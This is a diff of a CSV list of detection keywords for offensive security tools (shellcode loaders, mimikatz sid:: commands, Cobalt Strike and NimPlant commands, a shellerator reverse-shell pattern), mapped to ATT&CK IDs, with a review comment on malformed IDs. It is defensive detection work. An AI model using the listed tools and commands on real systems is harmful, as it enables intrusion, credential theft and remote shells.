-"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
 "*ShellcodeRDI.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z"
 "*ShellcodeRDI.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
-"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*shellcode-runner.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","",""
 "*ShellcodeTemplate.x64.bin*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
 "*shellcodetester *","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
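Review bot: The rewritten nimplant row for `*ShellcodeRDI.py*` still carries the sub-technique as `T1059-001` and lists `TA0002` twice, while the other rows in this hunk use the dotted form (`T1059.003`, `T1055.012`). A consumer that joins `metadata_tool_techniques` against ATT&CK IDs would presumably fail to resolve the hyphenated value. Since the line is already being rewritten for the star count, I would set the two fields to `"T1059.001 - T1027 - T1036","TA0002 - TA0005"`. The `*shinject *` and `*shinject.nim*` rows in the next hunk have the same values. The same keyword also sits on the EvtMute row directly above and is covered by the sRDI pattern `*ShellcodeRDI.*`, so a match cannot be attributed to one tool; a short remark in `metadata_comment` would help triage.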
@@ -16855,79 +17038,79 @@ "*shellcodetester.sh*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" "*ShellCodeTester.sln*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" "*shellerator --reverse-shell --lhost * --lport * --type *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from 
process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*shellter.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
"*shepardsbind_recv.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*shepbind_serv.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*Sherlock.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*sherlock.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Shhmon.csproj*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*Shhmon.exe*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.git*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*shinject_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shocknawe.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*Shodan.io*","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" 
-"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*ShorSec/DllNotificationInjection*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*ShorSec/ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" 
-"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*shspawn x64 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shspawn x86 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shucknt.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*ShuckNT-main*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*ShutdownRepo/pywhisker*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*ShutdownRepo/smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 